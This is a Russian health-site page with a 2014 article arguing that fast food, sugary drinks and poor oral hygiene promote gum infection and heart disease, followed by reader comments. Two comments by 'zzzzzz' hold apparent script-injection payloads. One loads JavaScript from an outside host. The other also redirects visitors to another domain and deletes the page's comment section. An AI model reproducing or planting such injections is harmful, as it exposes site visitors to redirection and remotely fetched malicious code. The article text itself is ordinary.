Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ешь фаст фуд, не моешь ро...  >>  Ешь фаст фуд, не моешь рот – будет инфаркт!
 
Обратная связь
 

Ешь фаст фуд, не моешь рот – будет инфаркт!

Размер шрифта
25 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

«Чтоб мудро жизнь прожить, знать надобно немало,

Два важных правила запомни для начала:

Ты лучше голодай, чем что попало есть,

И лучше будь один, чем вместе с кем попало».

Первый тезис этого бессмертного стихотворения Омара Хайяма регулярно находит подтверждение в клинических исследованиях. Вот и на этот раз ученые нашли еще один повод побороть соблазн и пройти мимо «Макдоналдса».

Ешь фаст фуд, не моешь рот – будет инфаркт!

Скверное состояние гигиены ротовой полости и повышенное потребление сахаров приводят к развитию болезни периодонта – ткани, которая является для зуба тем же самым, что почва – для дерева. Однако оказывается, что гибель зуба – это еще меньшее из зол: ученые не так давно обнаружили, что хронический инфекционный процесс, протекающий в деснах, может приводить к развитию ишемической болезни, которая является главным убийцей современного человека. Считается, что инфекции во рту ускоряют атеросклероз – воспалительный процесс, приводящий к отложению бляшек в стенке кровеносных сосудов.

Связан ли фаст фуд с этими стоматологическими инфекциями? Самым что ни на есть прямым образом! Дело в том, что большинство продуктов, выпускаемым этими заведениями, содержат огромное количество простых углеводов. Эти сахара являются крайне благодатной средой для роста бактерий, которые начинают размножаться, словно грибы после дождя.

«Пища из заведений быстрого питания крайне вредна для сердечно-сосудистой системы, и не только потому что содержит несметное количество соли и жиров. Простые углеводы и их пагубное влияние на состояние полости рта являются еще одним немаловажным фактором», – рассказывает доктор Ахмед Рашид, один из со-авторов исследования, научный сотрудник отделения общественного здоровья Кембриджского университета (Великобритания). «При этом среди всех сомнительных продуктов из арсенала фаст фуда особую тревогу вызывают сладкие газированные напитки, которые просто-таки под завязку набиты сахаром».

Авторы с одобрением вспоминают, что в прошлом в городе Нью-Йорке предпринималась дерзкая попытка (пусть и не увенчавшаяся успехом) предельно ограничить продажу сладкой газировки. Однако в большинстве стран, в том числе и в России, эти напитки легко доступны на каждом углу, включая клиники и школы. «Необходимо проводить жесткую и бескомпромиссную борьбу против сладких газированных напитков, стимулировать людей отказываться от этого продукта. Ведь снижение потребления простых сахаров позволяет значительно снизить общий сердечно-сосудистый риск и избежать многих проблем со здоровьем», – уверен доктор Рашид.

Так что помните: извилистый путь к здоровому сердцу лежит в том числе и через ваш рот! Следите за его здоровьем и, конечно, как огня сторонитесь фаст фуда!

И вооружитесь информацией: материалы нашего специального проекта «Близко к сердцу» позволят ликвидировать пробелы в ваших знаниях о пламенном моторе, бьющемся у вас в груди.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

26 апреля 2014 в 12:17

Цитировать   |   Пожаловаться

бред блять

2 - zzzzzz

30 июня 2015 в 18:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как угробить свое сердце?!   От чего умирает Россия   Новое открытие перевернуло представление об атеросклерозе! Оказывается, холестерин не виноват   Одним выстрелом двух зайцев! Обезболивающее лечит диабет  
22 июня 2013Грецкие орехи спасут от инфаркта 20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
6 суперпродуктов от диабета
Чем полезен секс?
Чем страшен диабет?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.